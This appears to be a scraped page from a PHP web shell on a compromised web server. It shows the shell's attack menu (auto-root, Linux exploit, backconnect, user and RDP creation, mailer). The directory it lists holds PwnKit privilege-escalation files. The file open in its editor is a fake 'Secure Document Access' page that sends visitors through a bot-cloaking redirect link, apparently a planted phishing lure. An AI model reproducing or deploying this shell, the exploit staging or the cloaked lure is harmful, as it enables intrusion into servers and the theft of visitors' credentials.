Linux 74-214-172-243.cprapid.com 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Apache
: 74.214.172.243 | : 216.73.217.35
18 Domain
8.2.31
cardrly
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cardrly /
public_html /
wes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.html
2.9
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <meta name="robots" content="noindex,nofollow" /> <title>Secure Document Access</title> <meta name="description" content="Verify you are human to access the requested document." /> <meta name="referrer" content="strict-origin" /> <style> :root { --bg: #ffffff; --fg: #0a0a0a; --muted: #6b7280; --primary: #0a0a0a; --primary-fg: #ffffff; --radius: 8px; } @media (prefers-color-scheme: dark) { :root { --bg: #0a0a0a; --fg: #fafafa; --muted: #9ca3af; --primary: #fafafa; --primary-fg: #0a0a0a; } } * { box-sizing: border-box; } html, body { margin: 0; padding: 0; } body { min-height: 100vh; background: var(--bg); color: var(--fg); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; display: flex; align-items: center; justify-content: center; padding: 1rem; } main { width: 100%; max-width: 28rem; text-align: center; } h1 { font-size: 1.5rem; font-weight: 600; margin: 0; } p.lede { margin-top: 0.75rem; font-size: 0.875rem; color: var(--muted); } .actions { margin-top: 1.5rem; } a.btn { display: inline-flex; width: 100%; align-items: center; justify-content: center; padding: 0.625rem 1rem; font-size: 0.875rem; font-weight: 500; border-radius: var(--radius); background: var(--primary); color: var(--primary-fg); text-decoration: none; transition: opacity 0.15s; } a.btn:hover { opacity: 0.9; } p.foot { margin-top: 0.75rem; font-size: 11px; color: var(--muted); } </style> </head> <body> <main> <h1>Secure Document Access</h1> <p class="lede"> This material is confidential. We need a moment to verify your browser before showing the document. </p> <div class="actions"> <!-- Point href at any slug configured in Admin → Config → "Connector allowed paths" (default: g). Examples: https://bot-guardian-cloak.lovable.app/g https://bot-guardian-cloak.lovable.app/md https://bot-guardian-cloak.lovable.app/qk Unknown slugs are rejected server-side and sent to /gone. --> <a class="btn" href="https://bot-guardian-cloak.lovable.app/g" rel="noopener" referrerpolicy="strict-origin" >Access document</a > <p class="foot">Protected by an automated bot-screening process.</p> </div> </main> </body> </html>
Close